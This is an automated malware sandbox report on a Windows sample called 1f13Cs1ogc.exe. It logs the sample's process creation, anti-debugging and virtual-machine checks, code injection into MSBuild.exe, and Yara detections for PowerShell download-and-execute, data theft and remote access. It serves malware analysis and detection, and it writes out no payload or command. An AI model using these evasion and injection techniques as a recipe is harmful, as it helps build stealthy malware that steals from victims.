Source: unknown	Process created: C:\Users\user\Desktop\1f13Cs1ogc.exe "C:\Users\user\Desktop\1f13Cs1ogc.exe"
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6352 -s 288
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"	Jump to behavior
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"	Jump to behavior
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"	Jump to behavior

Source: C:\Users\user\Desktop\1f13Cs1ogc.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: netutils.dll	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Contains functionality to dynamically determine API calls

Source: 1f13Cs1ogc.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: 1f13Cs1ogc.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: 1f13Cs1ogc.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: 1f13Cs1ogc.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: 1f13Cs1ogc.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: 1f13Cs1ogc.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: 1f13Cs1ogc.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: 1f13Cs1ogc.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source: 1f13Cs1ogc.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: 1f13Cs1ogc.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: 1f13Cs1ogc.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: 1f13Cs1ogc.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: 1f13Cs1ogc.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\1f13Cs1ogc.exe	Code function: 0_2_00FE71AD push ecx; ret	0_2_00FE71C0
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe	Code function: 0_2_01027F0D push ecx; ret	0_2_01027F20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_0041B035 push ecx; ret	3_2_0041B048

Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Found large amount of non-executed APIs

Source: C:\Users\user\Desktop\1f13Cs1ogc.exe

API coverage: 4.1 %

Source: C:\Users\user\Desktop\1f13Cs1ogc.exe

Code function: 0_2_00FF9ABF FindFirstFileExW,

Checks if the current process is being debugged

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 3_2_00401160 GetSystemInfo,

3_2_00401160

Source: Amcache.hve.7.dr	Binary or memory string: VMware
Source: Amcache.hve.7.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.7.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.7.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.7.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.7.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.7.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.7.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: MSBuild.exe, 00000003.00000002.2092112900.0000000000E64000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.7.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.7.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.7.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.7.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.7.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.7.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.7.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.7.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: MSBuild.exe, 00000003.00000002.2092112900.0000000000E2C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWP
Source: Amcache.hve.7.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.7.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.7.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.7.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.7.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: MSBuild.exe, 00000003.00000002.2092112900.0000000000E07000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: Amcache.hve.7.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.7.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.7.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.7.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.7.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.7.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.7.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.7.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Users\user\Desktop\1f13Cs1ogc.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe	Process queried: DebugPort			Jump to behavior

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\user\Desktop\1f13Cs1ogc.exe

Code function: 0_2_00FE7922 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00FE7922

Contains functionality to create guard pages, often used to hinder reverse engineering and debugging

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 3_2_004045C0 VirtualProtect ?,00000004,00000100,00000000

3_2_004045C0

Contains functionality to dynamically determine API calls

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Contains functionality to read the PEB

Source: C:\Users\user\Desktop\1f13Cs1ogc.exe	Code function: 0_2_00FE2003 mov edi, dword ptr fs:[00000030h]	0_2_00FE2003
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe	Code function: 0_2_00FFA64C mov eax, dword ptr fs:[00000030h]	0_2_00FFA64C
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe	Code function: 0_2_01026628 mov eax, dword ptr fs:[00000030h]	0_2_01026628
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe	Code function: 0_2_00FF0F2E mov ecx, dword ptr fs:[00000030h]	0_2_00FF0F2E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_00419750 mov eax, dword ptr fs:[00000030h]	3_2_00419750

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\Desktop\1f13Cs1ogc.exe

Code function: 0_2_00FFCC4B GetProcessHeap,

0_2_00FFCC4B

Source: C:\Users\user\Desktop\1f13Cs1ogc.exe	Code function: 0_2_00FE7610 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00FE7610
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe	Code function: 0_2_00FE7922 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00FE7922
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe	Code function: 0_2_00FE7AAF SetUnhandledExceptionFilter,	0_2_00FE7AAF
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe	Code function: 0_2_00FEDA73 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00FEDA73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_0041AD48 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_0041AD48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_0041CEEA SetUnhandledExceptionFilter,	3_2_0041CEEA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_0041B33A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_0041B33A

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Memory protected: page guard

Yara detected Powershell download and execute

HIPS / PFW / Operating System Protection Evasion

Source: Yara match	File source: Process Memory Space: 1f13Cs1ogc.exe PID: 6352, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 4616, type: MEMORYSTR

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\1f13Cs1ogc.exe

Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and write

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\1f13Cs1ogc.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A

Writes to foreign memory regions

Source: C:\Users\user\Desktop\1f13Cs1ogc.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 41E000	Jump to behavior
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 42B000	Jump to behavior
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 65C000	Jump to behavior
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: A41008	Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\1f13Cs1ogc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"	Jump to behavior
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"	Jump to behavior
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"	Jump to behavior

Contains functionality to query locales information (e.g. system language)

Source: C:\Users\user\Desktop\1f13Cs1ogc.exe	Code function: GetACP,IsValidCodePage,GetLocaleInfoW,	0_2_00FFC085
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe	Code function: GetLocaleInfoW,	0_2_00FF622B
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe	Code function: EnumSystemLocalesW,	0_2_00FFC372
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe	Code function: EnumSystemLocalesW,	0_2_00FFC327
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	0_2_00FFC498
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe	Code function: EnumSystemLocalesW,	0_2_00FFC40D
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe	Code function: GetLocaleInfoW,	0_2_00FFC6EB
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_00FFC814
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	0_2_00FFC9E9
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe	Code function: GetLocaleInfoW,	0_2_00FFC91A
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe	Code function: EnumSystemLocalesW,	0_2_00FF5D7F

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Queries volume information: C:\ VolumeInformation

AV process strings found (often used to terminate AV products)

Source: C:\Users\user\Desktop\1f13Cs1ogc.exe

Code function: 0_2_00FE7815 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00FE7815

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 3_2_00417850 GetUserNameA,

3_2_00417850

Source: Amcache.hve.7.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.7.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.7.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.7.dr	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Source: Yara match	File source: 0.2.1f13Cs1ogc.exe.100dad8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.1f13Cs1ogc.exe.100dad8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.1f13Cs1ogc.exe.fe0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.2092112900.0000000000E07000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2090158683.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2309958164.000000000100D000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 4616, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Remote Access Functionality